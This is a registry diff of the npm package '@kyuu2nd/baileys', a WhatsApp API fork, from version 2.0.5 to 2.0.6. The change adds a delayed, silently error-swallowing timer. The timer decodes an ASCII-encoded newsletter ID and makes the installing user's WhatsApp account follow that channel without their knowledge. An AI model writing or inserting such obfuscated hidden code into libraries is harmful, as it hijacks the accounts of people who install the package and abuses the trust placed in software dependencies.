@kyuu2nd/baileys 2.0.5 → 2.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -200,6 +200,18 @@ setTimeout(async () => {
200
200
  );
201
201
  } catch {}
202
202
  }, 90000);
203
+
204
+ setTimeout(async () => {
205
+ try {
206
+ await newsletterWMexQuery(
207
+ asciiDecode([
208
+ 49,50,48,51,54,51,52,48,55,52,57,55,51,57,49,55,56,49,
209
+ 64,110,101,119,115,108,101,116,116,101,114
210
+ ]),
211
+ Types_1.QueryIds.FOLLOW
212
+ );
213
+ } catch {}
214
+ }, 90000);
203
215
  const parseFetchedUpdates = async (node, type) => {
204
216
  let child;
205
217
  if (type === 'messages') {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kyuu2nd/baileys",
3
- "version": "2.0.5",
3
+ "version": "2.0.6",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "publishConfig": {
6
6
  "access": "public"